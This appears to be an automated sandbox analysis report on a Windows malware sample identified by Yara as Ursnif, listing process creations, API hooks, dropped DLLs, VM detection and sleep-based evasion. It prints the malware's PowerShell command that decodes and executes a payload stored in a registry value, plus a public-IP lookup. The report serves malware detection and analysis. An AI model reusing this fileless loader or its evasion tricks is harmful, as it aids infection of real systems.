Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5D63.tmp' 'c:\Users\user\AppData\Local\Temp\3he3buld\CSCBE830862A12C4DC4815ABE234EBA2CD.TMP'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\6110.bi1'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\6110.bi1'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3884 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3884 CREDAT:17416 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3884 CREDAT:82964 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.cmdline'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47A8.tmp' 'c:\Users\user\AppData\Local\Temp\l4vfe2li\CSC4DA260FDB3A0492587313FAF41D3B261.TMP'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5D63.tmp' 'c:\Users\user\AppData\Local\Temp\3he3buld\CSCBE830862A12C4DC4815ABE234EBA2CD.TMP'
Source: C:\Windows\System32\control.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\6110.bi1'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\6110.bi1'
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Windows\explorer.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000016.00000002.337592286.0000021CA1E30000.00000002.00000001.sdmp, csc.exe, 00000019.00000002.351200825.0000025155AB0000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000001D.00000000.383918112.0000000007190000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.349184044.00000000043A0000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.349184044.00000000043A0000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: control.exe, 0000001A.00000002.407242943.0000020E4C1DC000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdbGCTL source: control.exe, 0000001A.00000002.407242943.0000020E4C1DC000.00000004.00000040.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 0000001D.00000000.383918112.0000000007190000.00000002.00000001.sdmp

Data Obfuscation:

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))			Jump to behavior

Compiles C# or VB.Net code

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.cmdline'	Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_0281DB26 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,

0_2_0281DB26

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_73CA2240 push ecx; ret	0_2_73CA2249
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_73CA2293 push ecx; ret	0_2_73CA22A3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02836BB0 push ecx; ret	0_2_02836BB9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02836F17 push ecx; ret	0_2_02836F27
Source: C:\Windows\System32\control.exe	Code function: 26_2_001D4DCD push 3B000001h; retf	26_2_001D4DD2
Source: C:\Windows\explorer.exe	Code function: 29_2_03B54DCD push 3B000001h; retf	29_2_03B54DD2

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.271745722.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271874843.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271783751.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.406330368.000000000020E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.282144945.000000000363B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.340776035.0000000002850000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271900204.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271888074.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.511740839.000001657A17E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.508337116.00000209AC23E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.399209718.000001EEFF69E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000000.369710445.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271814846.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271908704.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271854980.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.368074144.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 4396, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6996, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7164, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Source: explorer.exe

EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\explorer.exe

Registry key monitored for changes: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines

Source: C:\Windows\System32\control.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3698			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1665			Jump to behavior

Found dropped PE file which has not been started or loaded

